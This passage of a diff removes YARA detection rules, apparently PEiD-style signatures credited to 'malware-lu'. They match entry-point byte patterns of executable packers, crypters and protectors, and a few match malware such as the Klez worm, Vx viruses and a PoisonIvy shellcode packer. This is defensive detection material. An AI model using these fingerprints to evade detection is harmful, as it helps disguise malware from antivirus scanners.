-	$a1 = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 ?? 8B 00 EB 01 ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 01 ?? E8 3B 26 00 00 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule CopyProtectorv20
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 2E A2 ?? ?? 53 51 52 1E 06 B4 ?? 1E 0E 1F BA ?? ?? CD 21 1F }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXE32Packv139
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC ?? ?? ?? ?? 02 81 ?? ?? ?? ?? ?? ?? ?? 3B DB 74 01 BE 5D 8B D5 81 ED EC 8D 40 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXE32Packv138
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC ?? ?? ?? ?? 02 81 ?? ?? ?? ?? ?? ?? ?? 3B DB 74 01 BE 5D 8B D5 81 ED DC 8D 40 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv110EngdulekxtBorlandC1999
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 CD 20 2B C8 68 80 ?? ?? 00 EB 02 1E BB 5E EB 02 CD 20 68 B1 2B 6E 37 40 5B 0F B6 C9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ThinstallEmbedded2547V2600Jitit
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 58 BB BC 18 00 00 2B C3 50 68 ?? ?? ?? ?? 68 60 1B 00 00 68 60 00 00 00 E8 35 FF FF FF E9 99 FF FF FF 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv131Engdulekxt
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 A4 B6 80 FF D3 73 F9 33 C9 FF D3 73 16 33 C0 FF D3 73 23 B6 80 41 B0 10 FF D3 12 C0 73 FA 75 42 AA EB E0 E8 46 00 00 00 02 F6 83 D9 01 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 48 13 C9 EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SDProtectorBasicProEdition110RandyLi
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 1D 32 13 05 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 50 83 EC 08 64 A1 00 00 00 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 83 C4 08 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 64 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Petite12c1998IanLuck
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00 0A 00 0B 00 0D 00 0F 00 11 00 13 00 17 00 1B 00 1F 00 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 83 00 A3 00 C3 00 E3 00 02 01 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 01 02 02 02 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PcSharev40
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 90 34 40 00 68 B6 28 40 00 64 A1 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VProtector0X12Xvcasm
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 00 00 76 63 61 73 6D 5F 70 72 6F 74 65 63 74 5F ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 F6 E8 10 00 00 00 8B 64 24 08 64 8F 05 00 00 00 00 58 EB 13 C7 83 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 AD CD 20 EB 01 0F 31 F0 EB 0C 33 C8 EB 03 EB 09 0F 59 74 05 75 F8 51 EB F1 B9 04 00 00 00 E8 1F 00 00 00 EB FA E8 16 00 00 00 E9 EB F8 00 00 58 EB 09 0F 25 E8 F2 FF FF FF 0F B9 49 75 F1 EB 05 EB F9 EB F0 D6 E8 07 00 00 00 C7 83 83 C0 13 EB 0B 58 EB 02 CD 20 83 C0 02 EB 01 E9 50 C3 }
-
-condition:
-		$a0
-}
-	
-	
-rule STNPEE113
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 57 56 52 51 53 E8 00 00 00 00 5D 8B D5 81 ED 97 3B 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SoftDefenderV11xRandyLi
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 74 07 75 05 19 32 67 E8 E8 74 1F 75 1D E8 68 39 44 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CDCopsII
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 53 60 BD ?? ?? ?? ?? 8D 45 ?? 8D 5D ?? E8 ?? ?? ?? ?? 8D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPack11BasicEditionap0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 4A 02 00 00 8D 9D 11 01 00 00 33 FF EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB 8D 74 37 04 53 6A 40 68 00 10 00 00 68 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXE32Packv13x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 3B ?? 74 02 81 83 55 3B ?? 74 02 81 ?? 53 3B ?? 74 01 ?? ?? ?? ?? ?? 02 81 ?? ?? E8 ?? ?? ?? ?? 3B 74 01 ?? 5D 8B D5 81 ED }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxInvoluntary1349
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BA ?? ?? B9 ?? ?? 8C DD ?? 8C C8 ?? 8E D8 8E C0 33 F6 8B FE FC ?? ?? AD ?? 33 C2 AB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WinZip32bit6x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FF 15 FC 81 40 00 B1 22 38 08 74 02 B1 20 40 80 38 00 74 10 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NsPacKV36LiuXingPing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D ?? ?? ?? ?? ?? 83 38 01 0F 84 47 02 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02LCCWin321xAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 64 A1 01 00 00 00 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 9A 10 40 90 50 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXECrypt10ReBirth
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 90 60 E8 00 00 00 00 5D 81 ED D1 27 40 00 B9 15 00 00 00 83 C1 04 83 C1 01 EB 05 EB FE 83 C7 56 EB 00 EB 00 83 E9 02 81 C1 78 43 27 65 EB 00 81 C1 10 25 94 00 81 E9 63 85 00 00 B9 96 0C 00 00 90 8D BD 4E 28 40 00 8B F7 AC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NJoy11NEX
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 F0 B8 0C 3C 40 00 E8 24 FC FF FF 6A 00 68 28 3A 40 00 6A 0A 6A 00 E8 D8 FC FF FF E8 7F F5 FF FF 8D 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEcryptbyarchphase
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 E0 53 56 33 C0 89 45 E4 89 45 E0 89 45 EC ?? ?? ?? ?? 64 82 40 00 E8 7C C7 FF FF 33 C0 55 68 BE 84 40 00 64 FF 30 64 89 20 68 CC 84 40 00 ?? ?? ?? ?? 00 A1 10 A7 40 00 50 E8 1D C8 FF FF 8B D8 85 DB 75 39 E8 3A C8 FF FF 6A 00 6A 00 68 A0 A9 40 00 68 00 04 00 00 50 6A 00 68 00 13 00 00 E8 FF C7 FF FF 6A 00 68 E0 84 40 00 A1 A0 A9 40 00 50 6A 00 E8 ?? ?? ?? ?? E9 7D 01 00 00 53 A1 10 A7 40 00 50 E8 42 C8 FF FF 8B F0 85 F6 75 18 6A 00 68 E0 84 40 00 68 E4 84 40 00 6A 00 E8 71 C8 FF FF E9 53 01 00 00 53 6A 00 E8 2C C8 FF FF A3 ?? ?? ?? ?? 83 3D 48 A8 40 00 00 75 18 6A 00 68 E0 84 40 00 68 F8 84 40 00 6A 00 E8 43 C8 FF FF E9 25 01 00 00 56 E8 F8 C7 FF FF A3 4C A8 40 00 A1 48 A8 40 00 E8 91 A1 FF FF 8B D8 8B 15 48 A8 40 00 85 D2 7C 16 42 33 C0 8B 0D 4C A8 40 00 03 C8 8A 09 8D 34 18 88 0E 40 4A 75 ED 8B 15 48 A8 40 00 85 D2 7C 32 42 33 C0 8D 34 18 8A 0E 80 F9 01 75 05 C6 06 FF EB 1C 8D 0C 18 8A 09 84 ?? ?? ?? ?? ?? 00 EB 0E 8B 0D 4C A8 40 00 03 C8 0F B6 09 49 88 0E 40 4A 75 D1 8D ?? ?? ?? ?? E8 A5 A3 FF FF 8B 45 E8 8D 55 EC E8 56 D5 FF FF 8D 45 EC BA 18 85 40 00 E8 79 BA FF FF 8B 45 EC E8 39 BB FF FF 8B D0 B8 54 A8 40 00 E8 31 A6 FF FF BA 01 00 00 00 B8 54 A8 40 00 E8 12 A9 FF FF E8 DD A1 FF FF 68 50 A8 40 00 8B D3 8B 0D 48 A8 40 00 B8 54 A8 40 00 E8 56 A7 FF FF E8 C1 A1 FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CrunchPEv30xx
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 10 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 5D 81 ED 18 ?? ?? ?? 8B C5 55 60 9C 2B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF 74 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule LameCryptLaZaRus
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 66 9C BB 00 ?? ?? 00 80 B3 00 10 40 00 90 4B 83 FB FF 75 F3 66 9D 61 B8 ?? ?? 40 00 FF E0 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NsPack29NorthStar
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8A 06 3C 00 74 12 8B F5 8D B5 ?? ?? FF FF 8A 06 3C 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule BeRoEXEPackerv100LZBRSBeRoFarbrausch
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 BE ?? ?? ?? ?? BF ?? ?? ?? ?? FC AD 8D 1C 07 B0 80 3B FB 73 3B E8 ?? ?? ?? ?? 72 03 A4 EB F2 E8 ?? ?? ?? ?? 8D 51 FF E8 ?? ?? ?? ?? 56 8B F7 2B F2 F3 A4 5E EB DB 02 C0 75 03 AC 12 C0 C3 33 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv110EngdulekxtBorlandC
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 00 0F B6 C9 EB 02 CD 20 BB }
-	$a1 = { 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 00 0F B6 C9 EB 02 CD 20 BB F4 00 00 00 EB 02 04 FA EB 01 FA EB 01 5F EB 02 CD 20 8A 16 EB 02 11 31 80 E9 31 EB 02 30 11 C1 E9 11 80 EA 04 EB 02 F0 EA 33 CB 81 EA AB AB 19 08 04 D5 03 C2 80 EA }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule VIRUSIWormKLEZ
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 40 D2 40 ?? 68 04 AC 40 ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 BC D0 }
-
-condition:
-		$a0
-}
-	
-	
-rule YZPack12UsAr
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 4D 5A 52 45 60 83 EC 18 8B EC 8B FC 33 C0 64 8B 40 30 78 0C 8B 40 0C 8B 70 1C AD 8B 40 08 EB 09 8B 40 34 83 C0 7C 8B 40 3C AB E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02LocklessIntroPackAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 2C E8 EB 1A 90 90 5D 8B C5 81 ED F6 73 90 90 2B 85 90 90 90 90 83 E8 06 89 85 FF 01 EC AD }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PKLITE3211
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 4B 4C 49 54 45 33 32 20 43 6F 70 79 72 69 67 68 74 20 31 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv20bartxt
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 87 25 ?? ?? ?? 00 61 94 55 A4 B6 80 FF 13 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MSLRHv032afakeSVKP111emadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 64 A0 23 00 00 00 83 C5 06 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv110EngdulekxtMASM32TASM32MicrosoftVisualBasic
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { F7 D8 0F BE C2 BE 80 ?? ?? 00 0F BE C9 BF 08 3B 65 07 EB 02 D8 29 BB EC C5 9A F8 EB 01 94 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXECryptor239DLLminimumprotection
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 51 68 ?? ?? ?? ?? 87 2C 24 8B CD 5D 81 E1 ?? ?? ?? ?? E9 ?? ?? ?? 00 89 45 F8 51 68 ?? ?? ?? ?? 59 81 F1 ?? ?? ?? ?? 0B 0D ?? ?? ?? ?? 81 E9 ?? ?? ?? ?? E9 ?? ?? ?? 00 81 C2 ?? ?? ?? ?? E8 ?? ?? ?? 00 87 0C 24 59 51 64 8B 05 30 00 00 00 8B 40 0C 8B 40 0C E9 ?? ?? ?? 00 F7 D6 2B D5 E9 ?? ?? ?? 00 87 3C 24 8B CF 5F 87 14 24 1B CA E9 ?? ?? ?? 00 83 C4 08 68 ?? ?? ?? ?? E9 ?? ?? ?? 00 C3 E9 ?? ?? ?? 00 E9 ?? ?? ?? 00 50 8B C5 87 04 24 8B EC 51 0F 88 ?? ?? ?? 00 FF 05 ?? ?? ?? ?? E9 ?? ?? ?? 00 87 0C 24 59 99 03 04 24 E9 ?? ?? ?? 00 C3 81 D5 ?? ?? ?? ?? 9C E9 ?? ?? ?? 00 81 FA ?? ?? ?? ?? E9 ?? ?? ?? 00 C1 C3 15 81 CB ?? ?? ?? ?? 81 F3 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 87 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Frusionbiff
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 EC 0C 53 55 56 57 68 04 01 00 00 C7 44 24 14 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule OpenSourceCodeCrypterp0ke
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC B9 09 00 00 00 6A 00 6A 00 49 75 F9 53 56 57 B8 34 44 40 00 E8 28 F8 FF FF 33 C0 55 68 9F 47 40 00 64 FF 30 64 89 20 BA B0 47 40 00 B8 1C 67 40 00 E8 07 FD FF FF 8B D8 85 DB 75 07 6A 00 E8 C2 F8 FF FF BA 28 67 40 00 8B C3 8B 0D 1C 67 40 00 E8 F0 E0 FF FF BE 01 00 00 00 B8 2C 68 40 00 E8 E1 F0 FF FF BF 0A 00 00 00 8D 55 EC 8B C6 E8 92 FC FF FF 8B 4D EC B8 2C 68 40 00 BA BC 47 40 00 E8 54 F2 FF FF A1 2C 68 40 00 E8 52 F3 FF FF 8B D0 B8 20 67 40 00 E8 A2 FC FF FF 8B D8 85 DB 0F 84 52 02 00 00 B8 24 67 40 00 8B 15 20 67 40 00 E8 78 F4 FF FF B8 24 67 40 00 E8 7A F3 FF FF 8B D0 8B C3 8B 0D 20 67 40 00 E8 77 E0 FF FF 8D 55 E8 A1 24 67 40 00 E8 42 FD FF FF 8B 55 E8 B8 24 67 40 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule QrYPt0rbyNuTraL
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 80 F9 00 0F 84 8D 01 00 00 8A C3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 32 C1 3C F3 75 89 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? BA D9 04 00 00 E8 00 00 00 00 5F 81 C7 16 01 00 00 80 2C 3A 01 }
-	$a1 = { 86 18 CC 64 FF 35 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 64 89 25 00 00 00 00 BB 00 00 F7 BF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B8 78 56 34 12 87 03 E8 CD FE FF FF E8 B3 }
-	$a2 = { EB 00 E8 B5 00 00 00 E9 2E 01 00 00 64 FF 35 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 64 89 25 00 00 00 00 8B 44 24 04 }
-
-condition:
-		$a0 or $a1 or $a2 at pe.entry_point
-}
-	
-	
-rule EXECryptor2xxmaxcompressedresources
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 EC FC 53 57 56 89 45 FC 89 55 F8 89 C6 89 D7 66 81 3E 4A 43 0F 85 23 01 00 00 83 C6 0A C7 45 F4 08 00 00 00 31 DB BA 00 00 00 80 43 31 C0 E8 11 01 00 00 73 0E 8B 4D F0 E8 1F 01 00 00 02 45 EF AA EB E9 E8 FC 00 00 00 0F 82 97 00 00 00 E8 F1 00 00 00 73 5B B9 04 00 00 00 E8 FD 00 00 00 48 74 DE 0F 89 C7 00 00 00 E8 D7 00 00 00 73 1B 55 BD 00 01 00 00 E8 D7 00 00 00 88 07 47 4D 75 F5 E8 BF 00 00 00 72 E9 5D EB A2 B9 01 00 00 00 E8 C8 00 00 00 83 C0 07 89 45 F0 C6 45 EF 00 83 F8 08 74 89 E8 A9 00 00 00 88 45 EF E9 7C FF FF FF B9 07 00 00 00 E8 A2 00 00 00 50 }
-
-condition:
-		$a0
-}
-	
-	
-rule Upackv024v028AlphaDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE 88 01 40 00 AD ?? ?? 95 AD 91 F3 A5 AD }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ThinstallEmbedded24222428Jitit
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC B8 ?? ?? ?? ?? BB ?? ?? ?? ?? 50 E8 00 00 00 00 58 2D 9B 1A 00 00 B9 84 1A 00 00 BA 14 1B 00 00 BE 00 10 00 00 BF B0 53 00 00 BD E0 1A 00 00 03 E8 81 75 00 ?? ?? ?? ?? 81 75 04 ?? ?? ?? ?? 81 75 08 ?? ?? ?? ?? 81 75 0C ?? ?? ?? ?? 81 75 10 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SVKProtectorv1051
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 EB 03 C7 84 E8 EB 03 C7 84 9A E8 00 00 00 00 5D 81 ED 10 00 00 00 EB 03 C7 84 E9 64 A0 23 00 00 00 EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AHTeamEPProtector03fakeZCode101FEUERRADER
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 E9 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E9 FB FF FF FF C3 68 00 00 00 00 64 FF 35 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEPacker
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FC 8B 35 70 01 40 ?? 83 EE 40 6A 40 68 ?? 30 10 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ProgramProtectorXPv10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? ?? ?? 58 83 D8 05 89 C3 81 C3 ?? ?? ?? ?? 8B 43 64 50 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SimplePack111Method2NTbagieTMX
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 4D 5A 90 EB 01 00 52 E9 89 01 00 00 50 45 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 0F 03 0B 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MSLRHv032aemadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 81 83 C4 04 E8 0A 00 00 00 E8 }
-	$a1 = { EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 }
-	$a2 = { E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 81 83 C4 04 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 3D FF FF FF 00 EB 01 68 EB 02 CD 20 EB 01 E8 76 1B EB 01 68 EB 02 CD 20 EB 01 E8 CC 66 B8 FE 00 74 04 75 02 EB 02 EB 01 81 66 E7 64 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C }
-
-condition:
-		$a0 or $a1 or $a2 at pe.entry_point
-}
-	
-	
-rule VxHafen1641
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? 01 ?? ?? ?? CE CC 25 ?? ?? 25 ?? ?? 25 ?? ?? 40 51 D4 ?? ?? ?? CC 47 CA ?? ?? 46 8A CC 44 88 CC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NativeUDPacker11ModdedPoisonIvyShellcodeokkixot
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 31 C0 31 DB 31 C9 EB 0E 6A 00 6A 00 6A 00 6A 00 FF 15 28 41 40 00 FF 15 94 40 40 00 89 C7 68 88 13 00 00 FF 15 98 40 40 00 FF 15 94 40 40 00 81 C7 88 13 00 00 39 F8 73 05 E9 84 00 00 00 6A 40 68 00 10 00 00 FF 35 04 30 40 00 6A 00 FF 15 A4 40 40 00 89 C7 FF 35 04 30 40 00 68 CA 10 40 00 50 FF 15 A8 40 40 00 6A 40 68 00 10 00 00 FF 35 08 30 40 00 6A 00 FF 15 A4 40 40 00 89 C6 68 00 30 40 00 FF 35 04 30 40 00 57 FF 35 08 30 40 00 50 6A 02 FF 15 4E 41 40 00 6A 00 6A 00 6A 00 56 6A 00 6A 00 FF 15 9C 40 40 00 50 6A 00 6A 00 6A 11 50 FF 15 4A 41 40 00 58 6A FF 50 FF 15 AC 40 40 00 6A 00 FF 15 A0 40 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXECryptor2xxcompressedresources
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 56 57 53 31 DB 89 C6 89 D7 0F B6 06 89 C2 83 E0 1F C1 EA 05 74 2D 4A 74 15 8D 5C 13 02 46 C1 E0 08 89 FA 0F B6 0E 46 29 CA 4A 29 C2 EB 32 C1 E3 05 8D 5C 03 04 46 89 FA 0F B7 0E 29 CA 4A 83 C6 02 EB 1D C1 E3 04 46 89 C1 83 E1 0F 01 CB C1 E8 05 73 07 43 89 F2 01 DE EB 06 85 DB 74 0E EB A9 56 89 D6 89 D9 F3 A4 31 DB 5E EB 9D 89 F0 5B 5F 5E C3 }
-
-condition:
-		$a0
-}
-	
-	
-rule NXPEPackerv10
